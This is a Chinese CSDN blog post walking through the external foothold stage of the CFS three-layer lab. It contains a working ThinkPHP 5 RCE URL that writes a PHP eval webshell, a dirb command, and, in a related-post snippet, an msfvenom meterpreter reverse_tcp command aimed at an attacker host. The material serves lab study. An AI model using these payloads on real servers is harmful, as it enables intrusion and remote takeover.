CFS三层内网渗透——外网打点（一）

古希腊掌管猴子的神

已于 2024-07-25 21:13:35 修改

阅读量909

点赞数 32

文章标签：网络安全服务器安全 linux windows

于 2024-07-05 14:03:26 首次发布

本文链接：https://blog.csdn.net/weixin_74171325/article/details/140190103

版权

外网打点

先爆破一下看看有没有啥可进攻路径

尝试那个可疑的路径发现是thinkphp这个框架，同时也知道了版本，那就nday打吧

写入php

编辑写入php成功，简简单单nday拿下编辑

蚁剑rce尝试链接

打点成功

外网打点

先爆破一下看看有没有啥可进攻路径

dirsearch,dirb,gobuster等工具都可以尝试

dirb http://192.168.20.130/

尝试那个可疑的路径发现是thinkphp这个框架，同时也知道了版本，那就nday打吧

写入php

http://192.168.20.130/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

写入php成功，简简单单nday拿下

http://192.168.20.130/public/shell.php

蚁剑rce尝试链接

打点成功

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

古希腊掌管猴子的神

关注关注

32
点赞
踩
4

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CFS三层内网渗透——进入二层内网并socks转发流量(二)

weixin_74171325的博客

07-05

927

生成一个elf病毒,然后通过蚁剑进行wget远程传输，前面文章有提到各种文件传输方式Linux文件传输-CSDN博客文章浏览阅读271次。由于curl是访问，不带命令参数的话就是简单的访问远程目标文件，不会进行下载。这里我拿kali来演示，先创建个要传输的文件，然后python开启监听。

cfs三层靶机——内网渗透

记录学习

09-09

1452

内网渗透

参与评论您还未登录，请先登录后发表或查看评论

CFS三层内网渗透——第二层内网打点并拿下第三层内网（三）

weixin_74171325的博客

07-05

443

看到后台网页首页的源代码，如果有php一句话就开始尝试，没有就直接手动添加。该路径存在sql注入漏洞，利用sqlmap跑出账户和密码。因为他是在内网里面，配置socks流量转发代理。先上线再监听，因为这个是正向shell。

【VulnHub靶场】——CFS三层靶机内网渗透实操

热门推荐

Demo不是emo的博客

08-07

1万+

CFS三层靶场实操

CFS三层内网漫游渗透测试演练

qq_36585338的博客

03-30

518

通过获取Target1主机权限，在MSF_target1会话中添加一条Target1到Target2的路由地址，使MSF_target1这个会话能够与Target2正常通信。但是要想通过本地或利用其它工具去访问Target2主机一些服务，就需要将MSF_target1这个会话开启socks代理，这时我们可以通过socks代理中转访问到Target2。依次类推，将Target2主机当作跳板，进行攻击Target3主机！

CFS 三层内网环境搭建及渗透

m0_62207170的博客

03-14

1142

cfs三层内网搭建及其复现

渗透测试之CFS三层靶机内网渗透

LvHLong的博客

02-23

6511

一、环境搭建：靶机拓扑： 1.添加虚拟网卡：添加 22网段（VMnet2）和 33(VMnet3)网段的网卡 VMnet8为NAT模式与外部通信 2.配置网卡： target1网络配置： target2网络配置： target3网络配置： 3.web靶机搭建（宝塔面板启动）启动命令： /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 环境搭建完 kali能ping通ta..

CFS三层宝塔内网渗透

m0_65096687的博客

04-09

764

1.靶场搭建自行百度一共有三个目标targetkali攻击机与targe1网段是一致。因为是内网渗透。进入正题直接访问目标主机，发现是thinkphp5。直接百度thinkphp5的exp发现利用漏洞上传一句话木马上传后使用蚁剑进行连接拿到权限后输入 uname-a 来查看当前主机的操作系统然后在kali中msf线上找马生成一个linux x64 的木马然后使用蚁剑传入target1中获取shell（我是一个初学者，我我的理解是使用普通的蚁剑获取shell后再使用隧道代理会有些麻烦，我也不会。所以

【VulHub靶场】之CFS三层靶机内网渗透

weixin_51519028的博客

10-21

1797

msf配置代理的实操

Cfs三层靶机内网渗透模拟

weixin_68210863的博客

10-23

1044

cfs三层靶机渗透详细过程

渗透测试——CFS三层靶机渗透

抚琴

01-29

2249

是样一个逻辑 nmap信息收集： nmap -T4 -O 192.168.1.107 http://192.168.1.107/public/ 看到这个版本就会想起：ThinkPHP-V5.0-RCE-远程代码执行漏洞 payload： http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.

渗透测试——CFS三层靶机渗透搭建手册

抚琴

01-29

1240

搭建手册： 1、网络搭建： kali ping同Target1 Target2 ping同Target3 Target1 Target2 Target3 默认密码 teamssix.com 2、宝塔搭建启动命令： /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 忘记密码：恢复默认 bt default 如果无法访问新建站点到这里环境就搭建好了 ...

53-4 内网代理6 - frp搭建三层代理

weixin_43263566的博客

07-09

263

kali连接域控远程桌面以上即完成了三级网络代理的搭建。

CSF三层主机：渗透测试靶场笔记

Zeker62的博客

03-27

5792

测试的时候会出现各种错误，存在重新搭建环境的情况，如有IP对不上号，请尽量忽略。

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8486

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

常见的VPS或者独立服务器的控制面板推荐

最新发布

web_geek的博客

10-01

1188

cPanel和Plesk适合需要全面功能和高度可靠性的用户，尤其是那些使用HostEase服务器的用户。随着越来越多的企业和个人转向VPS和独立服务器以获得更高的性能和灵活性，选择合适的控制面板变得尤为重要。DirectAdmin 是一个轻量级控制面板，适用于管理 RHEL、CentOS、AlmaLinux、Rocky Linux、CloudLinux、Debian 和 Ubuntu 等操作系统的托管环境。其易用的界面和强大的功能集，使其成为个人、小型企业和网络提供商的理想选择。

服务器感染了.baxia勒索病毒，如何确保数据文件完整恢复？

数据恢复研究℃

09-28

702

baxia勒索病毒是一种设计精巧的恶意软件，它通过加密受害者的文件并更改文件扩展名为“.baxia”，使得数据无法正常访问。一旦感染，该病毒会扫描计算机中的图像、视频、生产力文档等文件（如.doc、.docx、.xls、.pdf等），并对这些文件进行加密。加密完成后，病毒会显示一个包含勒索信息的文件，要求受害者支付比特币等加密货币以换取数据访问权。.baxia勒索病毒不仅具备自我升级能力，能够通过网络自我更新其加密算法和传播技术，还使用伪装技术隐藏在正常的文件和应用程序中，避开传统的防病毒扫描。

电脑加密机的基本功能与模块

SafePloy_SH的博客

09-30

725

当需要传输数据时，加密机会将数据进行加密处理，使得数据在传输过程中以密文的形式存在，从而防止数据被未经授权的人员获取和篡改。加密机与主机之间使用TCP/IP协议通信，因此对主机的类型和主机操作系统无特殊要求，但仍需确保加密机与主机的硬件和软件环境相匹配。电脑加密机，又称主机加密机，是一种通过国家商用密码主管部门鉴定并批准使用的国内自主开发的主机加密设备。功能：电脑加密机主要通过使用密码学算法对数据进行加密和解密，以保护数据的机密性和完整性。性能：加密机的性能会影响加密和解密的速度以及系统的整体性能。

cfs内网渗透centos7靶机下载

12-05

为了在CentOS 7靶机上进行内网渗透，我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下： 1. 在Kali Linux上打开代理，以便访问CentOS 7靶机的网站。 2. 打开浏览器，输入CentOS 7靶机的IP地址和80端口号，访问网站。 3. 在网站上查找需要下载的文件，并下载到本地。另外，我们还可以使用msfvenom生成一个meterpreter反向Shell，然后将其上传到CentOS 7靶机上进行下载。具体步骤如下： 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell，命令如下： ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中，`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号，`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上，可以使用scp命令，命令如下： ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中，`<username>`为CentOS 7靶机上的用户名，`<target IP>`为CentOS 7靶机的IP地址，`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件，命令如下： ```shell ./muma.elf ``` 运行后，反向Shell会连接到攻击者的机器，攻击者可以通过反向Shell进行下载等操作。